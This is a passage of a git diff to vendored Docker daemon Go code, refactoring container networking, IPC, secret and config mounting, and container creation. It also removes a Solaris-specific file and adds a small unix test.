*container.Container, networkName string, force bool) error { n, err := daemon.FindNetwork(networkName) + container.Lock() + defer container.Unlock() + if !container.Running || (err != nil && force) { if container.RemovalInProgress || container.Dead { return errRemovalContainer(container.ID) @@ -1009,16 +1092,16 @@ func (daemon *Daemon) DisconnectFromNetwork(container *container.Container, netw return err } - if err := container.ToDiskLocking(); err != nil { - return fmt.Errorf("Error saving container to disk: %v", err) + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + return err } if n != nil { - attributes := map[string]string{ + daemon.LogNetworkEventWithAttributes(n, "disconnect", map[string]string{ "container": container.ID, - } - daemon.LogNetworkEventWithAttributes(n, "disconnect", attributes) + }) } + return nil } @@ -1035,7 +1118,7 @@ func (daemon *Daemon) ActivateContainerServiceBinding(containerName string) erro return sb.EnableService() } -// DeactivateContainerServiceBinding remove this container fromload balancer active rotation, and DNS response +// DeactivateContainerServiceBinding removes this container from load balancer active rotation, and DNS response func (daemon *Daemon) DeactivateContainerServiceBinding(containerName string) error { container, err := daemon.GetContainer(containerName) if err != nil { @@ -1043,7 +1126,25 @@ func (daemon *Daemon) DeactivateContainerServiceBinding(containerName string) er } sb := daemon.getNetworkSandbox(container) if sb == nil { - return fmt.Errorf("network sandbox does not exist for container %s", containerName) + // If the network sandbox is not found, then there is nothing to deactivate + logrus.Debugf("Could not find network sandbox for container %s on service binding deactivation request", containerName) + return nil } return sb.DisableService() } + +func getNetworkID(name string, endpointSettings *networktypes.EndpointSettings) string { + // We only want to prefer NetworkID for user defined networks. + // For systems like bridge, none, etc. the name is preferred (otherwise restart may cause issues) + if containertypes.NetworkMode(name).IsUserDefined() && endpointSettings != nil && endpointSettings.NetworkID != "" { + return endpointSettings.NetworkID + } + return name +} + +// updateSandboxNetworkSettings updates the sandbox ID and Key. +func updateSandboxNetworkSettings(c *container.Container, sb libnetwork.Sandbox) error { + c.NetworkSettings.SandboxID = sb.ID() + c.NetworkSettings.SandboxKey = sb.Key() + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_solaris.go b/vendor/github.com/docker/docker/daemon/container_operations_solaris.go deleted file mode 100644 index 1653948de1..0000000000 --- a/vendor/github.com/docker/docker/daemon/container_operations_solaris.go +++ /dev/null @@ -1,46 +0,0 @@ -// +build solaris - -package daemon - -import ( - "github.com/docker/docker/container" - "github.com/docker/docker/runconfig" - "github.com/docker/libnetwork" -) - -func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { - return nil, nil -} - -func (daemon *Daemon) setupIpcDirs(container *container.Container) error { - return nil -} - -func killProcessDirectly(container *container.Container) error { - return nil -} - -func detachMounted(path string) error { - return nil -} - -func isLinkable(child *container.Container) bool { - // A container is linkable only if it belongs to the default network - _, ok := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] - return ok -} - -func enableIPOnPredefinedNetwork() bool { - return false -} - -func (daemon *Daemon) isNetworkHotPluggable() bool { - return false -} - -func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error { - return nil -} - -func initializeNetworkingPaths(container *container.Container, nc *container.Container) { -} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_unix.go b/vendor/github.com/docker/docker/daemon/container_operations_unix.go index 2296045765..bc7ee45233 100644 --- a/vendor/github.com/docker/docker/daemon/container_operations_unix.go +++ b/vendor/github.com/docker/docker/daemon/container_operations_unix.go @@ -1,27 +1,28 @@ // +build linux freebsd -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "io/ioutil" "os" "path/filepath" "strconv" - "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/cloudflare/cfssl/log" "github.com/docker/docker/container" "github.com/docker/docker/daemon/links" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/runconfig" "github.com/docker/libnetwork" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/opencontainers/selinux/go-selinux/label" "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { @@ -57,133 +58,143 @@ func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]s return env, nil } -func (daemon *Daemon) getIpcContainer(container *container.Container) (*container.Container, error) { - containerID := container.HostConfig.IpcMode.Container() - c, err := daemon.GetContainer(containerID) +func (daemon *Daemon) getIpcContainer(id string) (*container.Container, error) { + errMsg := "can't join IPC of container " + id + // Check the container exists + container, err := daemon.GetContainer(id) if err != nil { - return nil, err + return nil, errors.Wrap(err, errMsg) } - if !c.IsRunning() { - return nil, fmt.Errorf("cannot join IPC of a non running container: %s", containerID) + // Check the container is running and not restarting + if err := daemon.checkContainer(container, containerIsRunning, containerIsNotRestarting); err != nil { + return nil, errors.Wrap(err, errMsg) } - if c.IsRestarting() { - return nil, errContainerIsRestarting(container.ID) + // Check the container ipc is shareable + if st, err := os.Stat(container.ShmPath); err != nil || !st.IsDir() { + if err == nil || os.IsNotExist(err) { + return nil, errors.New(errMsg + ": non-shareable IPC") + } + // stat() failed? + return nil, errors.Wrap(err, errMsg+": unexpected error from stat "+container.ShmPath) } - return c, nil + + return container, nil } func (daemon *Daemon) getPidContainer(container *container.Container) (*container.Container, error) { containerID := container.HostConfig.PidMode.Container() - c, err := daemon.GetContainer(containerID) + container, err := daemon.GetContainer(containerID) if err != nil { - return nil, err + return nil, errors.Wrapf(err, "cannot join PID of a non running container: %s", containerID) } + return container, daemon.checkContainer(container, containerIsRunning, containerIsNotRestarting) +} + +func containerIsRunning(c *container.Container) error { if !c.IsRunning() { - return nil, fmt.Errorf("cannot join PID of a non running container: %s", containerID) + return errdefs.Conflict(errors.Errorf("container %s is not running", c.ID)) } + return nil +} + +func containerIsNotRestarting(c *container.Container) error { if c.IsRestarting() { - return nil, errContainerIsRestarting(container.ID) + return errContainerIsRestarting(c.ID) } - return c, nil + return nil } func (daemon *Daemon) setupIpcDirs(c *container.Container) error { - var err error - - c.ShmPath, err = c.ShmResourcePath() - if err != nil { - return err - } + ipcMode := c.HostConfig.IpcMode - if c.HostConfig.IpcMode.IsContainer() { - ic, err := daemon.getIpcContainer(c) + switch { + case ipcMode.IsContainer(): + ic, err := daemon.getIpcContainer(ipcMode.Container()) if err != nil { return err } c.ShmPath = ic.ShmPath - } else if c.HostConfig.IpcMode.IsHost() { + + case ipcMode.IsHost(): if _, err := os.Stat("/dev/shm"); err != nil { return fmt.Errorf("/dev/shm is not mounted, but must be for --ipc=host") } c.ShmPath = "/dev/shm" - } else { - rootUID, rootGID := daemon.GetRemappedUIDGID() + + case ipcMode.IsPrivate(), ipcMode.IsNone(): + // c.ShmPath will/should not be used, so make it empty. + // Container's /dev/shm mount comes from OCI spec. + c.ShmPath = "" + + case ipcMode.IsEmpty(): + // A container was created by an older version of the daemon. + // The default behavior used to be what is now called "shareable". + fallthrough + + case ipcMode.IsShareable(): + rootIDs := daemon.idMappings.RootPair() if !c.HasMountFor("/dev/shm") { shmPath, err := c.ShmResourcePath() if err != nil { return err } - if err := idtools.MkdirAllAs(shmPath, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(shmPath, 0700, rootIDs); err != nil { return err } - shmSize := container.DefaultSHMSize - if c.HostConfig.ShmSize != 0 { - shmSize = c.HostConfig.ShmSize - } - shmproperty := "mode=1777,size=" + strconv.FormatInt(shmSize, 10) - if err := syscall.Mount("shm", shmPath, "tmpfs", uintptr(syscall.MS_NOEXEC|syscall.MS_NOSUID|syscall.MS_NODEV), label.FormatMountLabel(shmproperty, c.GetMountLabel())); err != nil { + shmproperty := "mode=1777,size=" + strconv.FormatInt(c.HostConfig.ShmSize, 10) + if err := unix.Mount("shm", shmPath, "tmpfs", uintptr(unix.MS_NOEXEC|unix.MS_NOSUID|unix.MS_NODEV), label.FormatMountLabel(shmproperty, c.GetMountLabel())); err != nil { return fmt.Errorf("mounting shm tmpfs: %s", err) } - if err := os.Chown(shmPath, rootUID, rootGID); err != nil { + if err := os.Chown(shmPath, rootIDs.UID, rootIDs.GID); err != nil { return err } + c.ShmPath = shmPath } + default: + return fmt.Errorf("invalid IPC mode: %v", ipcMode) } return nil } func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) { - if len(c.SecretReferences) == 0 { + if len(c.SecretReferences) == 0 && len(c.ConfigReferences) == 0 { return nil } - localMountPath := c.SecretMountPath() - logrus.Debugf("secrets: setting up secret dir: %s", localMountPath) - + if err := daemon.createSecretsDir(c); err != nil { + return err + } defer func() { if setupErr != nil { - // cleanup - _ = detachMounted(localMountPath) - - if err := os.RemoveAll(localMountPath); err != nil { - log.Errorf("error cleaning up secret mount: %s", err) - } + daemon.cleanupSecretDir(c) } }() - // retrieve possible remapped range start for root UID, GID - rootUID, rootGID := daemon.GetRemappedUIDGID() - // create tmpfs - if err := idtools.MkdirAllAs(localMountPath, 0700, rootUID, rootGID); err != nil { - return errors.Wrap(err, "error creating secret local mount path") - } - tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootUID, rootGID) - if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "nodev,nosuid,noexec,"+tmpfsOwnership); err != nil { - return errors.Wrap(err, "unable to setup secret mount") + if c.DependencyStore == nil { + return fmt.Errorf("secret store is not initialized") } - for _, s := range c.SecretReferences { - if c.SecretStore == nil { - return fmt.Errorf("secret store is not initialized") - } + // retrieve possible remapped range start for root UID, GID + rootIDs := daemon.idMappings.RootPair() + for _, s := range c.SecretReferences { // TODO (ehazlett): use type switch when more are supported if s.File == nil { - return fmt.Errorf("secret target type is not a file target") + logrus.Error("secret target type is not a file target") + continue } - targetPath := filepath.Clean(s.File.Name) - // ensure that the target is a filename only; no paths allowed - if targetPath != filepath.Base(targetPath) { - return fmt.Errorf("error creating secret: secret must not be a path") + // secrets are created in the SecretMountPath on the host, at a + // single level + fPath, err := c.SecretFilePath(*s) + if err != nil { + return errors.Wrap(err, "error getting secret file path") } - - fPath := filepath.Join(localMountPath, targetPath) - if err := idtools.MkdirAllAs(filepath.Dir(fPath), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(filepath.Dir(fPath), 0700, rootIDs); err != nil { return errors.Wrap(err, "error creating secret mount path") } @@ -191,9 +202,9 @@ func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) { "name": s.File.Name, "path": fPath, }).Debug("injecting secret") - secret := c.SecretStore.Get(s.SecretID) - if secret == nil { - return fmt.Errorf("unable to get secret from secret store") + secret, err := c.DependencyStore.Secrets().Get(s.SecretID) + if err != nil { + return errors.Wrap(err, "unable to get secret from secret store") } if err := ioutil.WriteFile(fPath, secret.Spec.Data, s.File.Mode); err != nil { return errors.Wrap(err, "error injecting secret") @@ -208,26 +219,127 @@ func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) { return err } - if err := os.Chown(fPath, rootUID+uid, rootGID+gid); err != nil { + if err := os.Chown(fPath, rootIDs.UID+uid, rootIDs.GID+gid); err != nil { return errors.Wrap(err, "error setting ownership for secret") } + if err := os.Chmod(fPath, s.File.Mode); err != nil { + return errors.Wrap(err, "error setting file mode for secret") + } + } + + for _, ref := range c.ConfigReferences { + // TODO (ehazlett): use type switch when more are supported + if ref.File == nil { + logrus.Error("config target type is not a file target") + continue + } + + fPath, err := c.ConfigFilePath(*ref) + if err != nil { + return errors.Wrap(err, "error getting config file path for container") + } + if err := idtools.MkdirAllAndChown(filepath.Dir(fPath), 0700, rootIDs); err != nil { + return errors.Wrap(err, "error creating config mount path") + } + + logrus.WithFields(logrus.Fields{ + "name": ref.File.Name, + "path": fPath, + }).Debug("injecting config") + config, err := c.DependencyStore.Configs().Get(ref.ConfigID) + if err != nil { + return errors.Wrap(err, "unable to get config from config store") + } + if err := ioutil.WriteFile(fPath, config.Spec.Data, ref.File.Mode); err != nil { + return errors.Wrap(err, "error injecting config") + } + + uid, err := strconv.Atoi(ref.File.UID) + if err != nil { + return err + } + gid, err := strconv.Atoi(ref.File.GID) + if err != nil { + return err + } + + if err := os.Chown(fPath, rootIDs.UID+uid, rootIDs.GID+gid); err != nil { + return errors.Wrap(err, "error setting ownership for config") + } + if err := os.Chmod(fPath, ref.File.Mode); err != nil { + return errors.Wrap(err, "error setting file mode for config") + } + } + + return daemon.remountSecretDir(c) +} + +// createSecretsDir is used to create a dir suitable for storing container secrets. +// In practice this is using a tmpfs mount and is used for both "configs" and "secrets" +func (daemon *Daemon) createSecretsDir(c *container.Container) error { + // retrieve possible remapped range start for root UID, GID + rootIDs := daemon.idMappings.RootPair() + dir, err := c.SecretMountPath() + if err != nil { + return errors.Wrap(err, "error getting container secrets dir") } + // create tmpfs + if err := idtools.MkdirAllAndChown(dir, 0700, rootIDs); err != nil { + return errors.Wrap(err, "error creating secret local mount path") + } + + tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootIDs.UID, rootIDs.GID) + if err := mount.Mount("tmpfs", dir, "tmpfs", "nodev,nosuid,noexec,"+tmpfsOwnership); err != nil { + return errors.Wrap(err, "unable to setup secret mount") + } + return nil +} + +func (daemon *Daemon) remountSecretDir(c *container.Container) error { + dir, err := c.SecretMountPath() + if err != nil { + return errors.Wrap(err, "error getting container secrets path") + } + if err := label.Relabel(dir, c.MountLabel, false); err != nil { + logrus.WithError(err).WithField("dir", dir).Warn("Error while attempting to set selinux label") + } + rootIDs := daemon.idMappings.RootPair() + tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootIDs.UID, rootIDs.GID) + // remount secrets ro - if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "remount,ro,"+tmpfsOwnership); err != nil { - return errors.Wrap(err, "unable to remount secret dir as readonly") + if err := mount.Mount("tmpfs", dir, "tmpfs", "remount,ro,"+tmpfsOwnership); err != nil { + return errors.Wrap(err, "unable to remount dir as readonly") } return nil } -func killProcessDirectly(container *container.Container) error { - if _, err := container.WaitStop(10 * time.Second); err != nil { +func (daemon *Daemon) cleanupSecretDir(c *container.Container) { + dir, err := c.SecretMountPath() + if err != nil { + logrus.WithError(err).WithField("container", c.ID).Warn("error getting secrets mount path for container") + } + if err := mount.RecursiveUnmount(dir); err != nil { + logrus.WithField("dir", dir).WithError(err).Warn("Error while attmepting to unmount dir, this may prevent removal of container.") + } + if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + logrus.WithField("dir", dir).WithError(err).Error("Error removing dir.") + } +} + +func killProcessDirectly(cntr *container.Container) error { + ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) + defer cancel() + + // Block until the container to stops or timeout. + status := <-cntr.Wait(ctx, container.WaitConditionNotRunning) + if status.Err() != nil { // Ensure that we don't kill ourselves - if pid := container.GetPID(); pid != 0 { - logrus.Infof("Container %s failed to exit within 10 seconds of kill - trying direct SIGKILL", stringid.TruncateID(container.ID)) - if err := syscall.Kill(pid, 9); err != nil { - if err != syscall.ESRCH { + if pid := cntr.GetPID(); pid != 0 { + logrus.Infof("Container %s failed to exit within 10 seconds of kill - trying direct SIGKILL", stringid.TruncateID(cntr.ID)) + if err := unix.Kill(pid, 9); err != nil { + if err != unix.ESRCH { return err } e := errNoSuchProcess{pid, 9} @@ -240,7 +352,7 @@ func killProcessDirectly(container *container.Container) error { } func detachMounted(path string) error { - return syscall.Unmount(path, syscall.MNT_DETACH) + return unix.Unmount(path, unix.MNT_DETACH) } func isLinkable(child *container.Container) bool { @@ -274,8 +386,18 @@ func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[] return nil } -func initializeNetworkingPaths(container *container.Container, nc *container.Container) { +func (daemon *Daemon) initializeNetworkingPaths(container *container.Container, nc *container.Container) error { container.HostnamePath = nc.HostnamePath container.HostsPath = nc.HostsPath container.ResolvConfPath = nc.ResolvConfPath + return nil +} + +func (daemon *Daemon) setupContainerMountsRoot(c *container.Container) error { + // get the root mount path so we can make it unbindable + p, err := c.MountsResourcePath("") + if err != nil { + return err + } + return idtools.MkdirAllAndChown(p, 0700, daemon.idMappings.RootPair()) } diff --git a/vendor/github.com/docker/docker/daemon/container_operations_windows.go b/vendor/github.com/docker/docker/daemon/container_operations_windows.go index d05f251e05..562528a8ef 100644 --- a/vendor/github.com/docker/docker/daemon/container_operations_windows.go +++ b/vendor/github.com/docker/docker/daemon/container_operations_windows.go @@ -1,20 +1,67 @@ -// +build windows - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "fmt" + "io/ioutil" + "os" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/system" "github.com/docker/libnetwork" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { return nil, nil } -// getSize returns real size & virtual size -func (daemon *Daemon) getSize(container *container.Container) (int64, int64) { - // TODO Windows - return 0, 0 +func (daemon *Daemon) setupConfigDir(c *container.Container) (setupErr error) { + if len(c.ConfigReferences) == 0 { + return nil + } + + localPath := c.ConfigsDirPath() + logrus.Debugf("configs: setting up config dir: %s", localPath) + + // create local config root + if err := system.MkdirAllWithACL(localPath, 0, system.SddlAdministratorsLocalSystem); err != nil { + return errors.Wrap(err, "error creating config dir") + } + + defer func() { + if setupErr != nil { + if err := os.RemoveAll(localPath); err != nil { + logrus.Errorf("error cleaning up config dir: %s", err) + } + } + }() + + if c.DependencyStore == nil { + return fmt.Errorf("config store is not initialized") + } + + for _, configRef := range c.ConfigReferences { + // TODO (ehazlett): use type switch when more are supported + if configRef.File == nil { + logrus.Error("config target type is not a file target") + continue + } + + fPath := c.ConfigFilePath(*configRef) + log := logrus.WithFields(logrus.Fields{"name": configRef.File.Name, "path": fPath}) + + log.Debug("injecting config") + config, err := c.DependencyStore.Configs().Get(configRef.ConfigID) + if err != nil { + return errors.Wrap(err, "unable to get config from config store") + } + if err := ioutil.WriteFile(fPath, config.Spec.Data, configRef.File.Mode); err != nil { + return errors.Wrap(err, "error injecting config") + } + } + + return nil } func (daemon *Daemon) setupIpcDirs(container *container.Container) error { @@ -35,6 +82,63 @@ func detachMounted(path string) error { return nil } +func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) { + if len(c.SecretReferences) == 0 { + return nil + } + + localMountPath, err := c.SecretMountPath() + if err != nil { + return err + } + logrus.Debugf("secrets: setting up secret dir: %s", localMountPath) + + // create local secret root + if err := system.MkdirAllWithACL(localMountPath, 0, system.SddlAdministratorsLocalSystem); err != nil { + return errors.Wrap(err, "error creating secret local directory") + } + + defer func() { + if setupErr != nil { + if err := os.RemoveAll(localMountPath); err != nil { + logrus.Errorf("error cleaning up secret mount: %s", err) + } + } + }() + + if c.DependencyStore == nil { + return fmt.Errorf("secret store is not initialized") + } + + for _, s := range c.SecretReferences { + // TODO (ehazlett): use type switch when more are supported + if s.File == nil { + logrus.Error("secret target type is not a file target") + continue + } + + // secrets are created in the SecretMountPath on the host, at a + // single level + fPath, err := c.SecretFilePath(*s) + if err != nil { + return err + } + logrus.WithFields(logrus.Fields{ + "name": s.File.Name, + "path": fPath, + }).Debug("injecting secret") + secret, err := c.DependencyStore.Secrets().Get(s.SecretID) + if err != nil { + return errors.Wrap(err, "unable to get secret from secret store") + } + if err := ioutil.WriteFile(fPath, secret.Spec.Data, s.File.Mode); err != nil { + return errors.Wrap(err, "error injecting secret") + } + } + + return nil +} + func killProcessDirectly(container *container.Container) error { return nil } @@ -48,12 +152,50 @@ func enableIPOnPredefinedNetwork() bool { } func (daemon *Daemon) isNetworkHotPluggable() bool { - return false + return true } func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error { return nil } -func initializeNetworkingPaths(container *container.Container, nc *container.Container) { +func (daemon *Daemon) initializeNetworkingPaths(container *container.Container, nc *container.Container) error { + + if nc.HostConfig.Isolation.IsHyperV() { + return fmt.Errorf("sharing of hyperv containers network is not supported") + } + + container.NetworkSharedContainerID = nc.ID + + if nc.NetworkSettings != nil { + for n := range nc.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(n) + if err != nil { + continue + } + + ep, err := getEndpointInNetwork(nc.Name, sn) + if err != nil { + continue + } + + data, err := ep.DriverInfo() + if err != nil { + continue + } + + if data["GW_INFO"] != nil { + gwInfo := data["GW_INFO"].(map[string]interface{}) + if gwInfo["hnsid"] != nil { + container.SharedEndpointList = append(container.SharedEndpointList, gwInfo["hnsid"].(string)) + } + } + + if data["hnsid"] != nil { + container.SharedEndpointList = append(container.SharedEndpointList, data["hnsid"].(string)) + } + } + } + + return nil } diff --git a/vendor/github.com/docker/docker/daemon/container_unix_test.go b/vendor/github.com/docker/docker/daemon/container_unix_test.go new file mode 100644 index 0000000000..b4c5f84c7e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_unix_test.go @@ -0,0 +1,44 @@ +// +build linux freebsd + +package daemon + +import ( + "testing" + + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/daemon/config" + "github.com/docker/go-connections/nat" + "gotest.tools/assert" +) + +// TestContainerWarningHostAndPublishPorts that a warning is returned when setting network mode to host and specifying published ports. +// This should not be tested on Windows because Windows doesn't support "host" network mode. +func TestContainerWarningHostAndPublishPorts(t *testing.T) { + testCases := []struct { + ports nat.PortMap + warnings []string + }{ + {ports: nat.PortMap{}}, + {ports: nat.PortMap{ + "8080": []nat.PortBinding{{HostPort: "8989"}}, + }, warnings: []string{"Published ports are discarded when using host network mode"}}, + } + + for _, tc := range testCases { + hostConfig := &containertypes.HostConfig{ + Runtime: "runc", + NetworkMode: "host", + PortBindings: tc.ports, + } + cs := &config.Config{ + CommonUnixConfig: config.CommonUnixConfig{ + Runtimes: map[string]types.Runtime{"runc": {}}, + }, + } + d := &Daemon{configStore: cs} + wrns, err := d.verifyContainerSettings("", hostConfig, &containertypes.Config{}, false) + assert.NilError(t, err) + assert.DeepEqual(t, tc.warnings, wrns) + } +} diff --git a/vendor/github.com/docker/docker/daemon/container_windows.go b/vendor/github.com/docker/docker/daemon/container_windows.go new file mode 100644 index 0000000000..0ca8039dd6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_windows.go @@ -0,0 +1,9 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/container" +) + +func (daemon *Daemon) saveApparmorConfig(container *container.Container) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/create.go b/vendor/github.com/docker/docker/daemon/create.go index c71d14e5fc..6702243faf 100644 --- a/vendor/github.com/docker/docker/daemon/create.go +++ b/vendor/github.com/docker/docker/daemon/create.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -7,21 +7,18 @@ import ( "strings" "time" - "github.com/pkg/errors" - - "github.com/Sirupsen/logrus" - apierrors "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" - "github.com/docker/docker/layer" "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/runconfig" - volumestore "github.com/docker/docker/volume/store" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // CreateManagedContainer creates a container that is managed by a Service @@ -37,17 +34,31 @@ func (daemon *Daemon) ContainerCreate(params types.ContainerCreateConfig) (conta func (daemon *Daemon) containerCreate(params types.ContainerCreateConfig, managed bool) (containertypes.ContainerCreateCreatedBody, error) { start := time.Now() if params.Config == nil { - return containertypes.ContainerCreateCreatedBody{}, fmt.Errorf("Config cannot be empty in order to create a container") + return containertypes.ContainerCreateCreatedBody{}, errdefs.InvalidParameter(errors.New("Config cannot be empty in order to create a container")) + } + + os := runtime.GOOS + if params.Config.Image != "" { + img, err := daemon.imageService.GetImage(params.Config.Image) + if err == nil { + os = img.OS + } + } else { + // This mean scratch. On Windows, we can safely assume that this is a linux + // container. On other platforms, it's the host OS (which it already is) + if runtime.GOOS == "windows" && system.LCOWSupported() { + os = "linux" + } } - warnings, err := daemon.verifyContainerSettings(params.HostConfig, params.Config, false) + warnings, err := daemon.verifyContainerSettings(os, params.HostConfig, params.Config, false) if err != nil { - return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, errdefs.InvalidParameter(err) } - err = daemon.verifyNetworkingConfig(params.NetworkingConfig) + err = verifyNetworkingConfig(params.NetworkingConfig) if err != nil { - return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, errdefs.InvalidParameter(err) } if params.HostConfig == nil { @@ -55,12 +66,12 @@ func (daemon *Daemon) containerCreate(params types.ContainerCreateConfig, manage } err = daemon.adaptContainerSettings(params.HostConfig, params.AdjustCPUShares) if err != nil { - return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, errdefs.InvalidParameter(err) } container, err := daemon.create(params, managed) if err != nil { - return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, daemon.imageNotExistToErrcode(err) + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err } containerActions.WithValues("create").UpdateSince(start) @@ -76,27 +87,40 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) ( err error ) + os := runtime.GOOS if params.Config.Image != "" { - img, err = daemon.GetImage(params.Config.Image) + img, err = daemon.imageService.GetImage(params.Config.Image) if err != nil { return nil, err } - - if runtime.GOOS == "solaris" && img.OS != "solaris " { - return nil, errors.New("Platform on which parent image was created is not Solaris") + if img.OS != "" { + os = img.OS + } else { + // default to the host OS except on Windows with LCOW + if runtime.GOOS == "windows" && system.LCOWSupported() { + os = "linux" + } } imgID = img.ID() + + if runtime.GOOS == "windows" && img.OS == "linux" && !system.LCOWSupported() { + return nil, errors.New("operating system on which parent image was created is not Windows") + } + } else { + if runtime.GOOS == "windows" { + os = "linux" // 'scratch' case. + } } if err := daemon.mergeAndVerifyConfig(params.Config, img); err != nil { - return nil, err + return nil, errdefs.InvalidParameter(err) } if err := daemon.mergeAndVerifyLogConfig(¶ms.HostConfig.LogConfig); err != nil { - return nil, err + return nil, errdefs.InvalidParameter(err) } - if container, err = daemon.newContainer(params.Name, params.Config, params.HostConfig, imgID, managed); err != nil { + if container, err = daemon.newContainer(params.Name, os, params.Config, params.HostConfig, imgID, managed); err != nil { return nil, err } defer func() { @@ -113,19 +137,35 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) ( container.HostConfig.StorageOpt = params.HostConfig.StorageOpt - // Set RWLayer for container after mount labels have been set - if err := daemon.setRWLayer(container); err != nil { - return nil, err + // Fixes: https://github.com/moby/moby/issues/34074 and + // https://github.com/docker/for-win/issues/999. + // Merge the daemon's storage options if they aren't already present. We only + // do this on Windows as there's no effective sandbox size limit other than + // physical on Linux. + if runtime.GOOS == "windows" { + if container.HostConfig.StorageOpt == nil { + container.HostConfig.StorageOpt = make(map[string]string) + } + for _, v := range daemon.configStore.GraphOptions { + opt := strings.SplitN(v, "=", 2) + if _, ok := container.HostConfig.StorageOpt[opt[0]]; !ok { + container.HostConfig.StorageOpt[opt[0]] = opt[1] + } + } } - rootUID, rootGID, err := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps) + // Set RWLayer for container after mount labels have been set + rwLayer, err := daemon.imageService.CreateLayer(container, setupInitLayer(daemon.idMappings)) if err != nil { - return nil, err + return nil, errdefs.System(err) } - if err := idtools.MkdirAs(container.Root, 0700, rootUID, rootGID); err != nil { + container.RWLayer = rwLayer + + rootIDs := daemon.idMappings.RootPair() + if err := idtools.MkdirAndChown(container.Root, 0700, rootIDs); err != nil { return nil, err } - if err := idtools.MkdirAs(container.CheckpointDir(), 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAndChown(container.CheckpointDir(), 0700, rootIDs); err != nil { return nil, err } @@ -133,7 +173,7 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) ( return nil, err } - if err := daemon.createContainerPlatformSpecificSettings(container, params.Config, params.HostConfig); err != nil { + if err := daemon.createContainerOSSpecificSettings(container, params.Config, params.HostConfig); err != nil { return nil, err } @@ -143,24 +183,37 @@ func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) ( } // Make sure NetworkMode has an acceptable value. We do this to ensure // backwards API compatibility. - container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig) + runconfig.SetDefaultNetModeIfBlank(container.HostConfig) daemon.updateContainerNetworkSettings(container, endpointsConfigs) - - if err := container.ToDisk(); err != nil { - logrus.Errorf("Error saving new container to disk: %v", err) - return nil, err - } if err := daemon.Register(container); err != nil { return nil, err } + stateCtr.set(container.ID, "stopped") daemon.LogContainerEvent(container, "create") return container, nil } -func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMode containertypes.PidMode, privileged bool) ([]string, error) { +func toHostConfigSelinuxLabels(labels []string) []string { + for i, l := range labels { + labels[i] = "label=" + l + } + return labels +} + +func (daemon *Daemon) generateSecurityOpt(hostConfig *containertypes.HostConfig) ([]string, error) { + for _, opt := range hostConfig.SecurityOpt { + con := strings.Split(opt, "=") + if con[0] == "label" { + // Caller overrode SecurityOpts + return nil, nil + } + } + ipcMode := hostConfig.IpcMode + pidMode := hostConfig.PidMode + privileged := hostConfig.Privileged if ipcMode.IsHost() || pidMode.IsHost() || privileged { - return label.DisableSecOpt(), nil + return 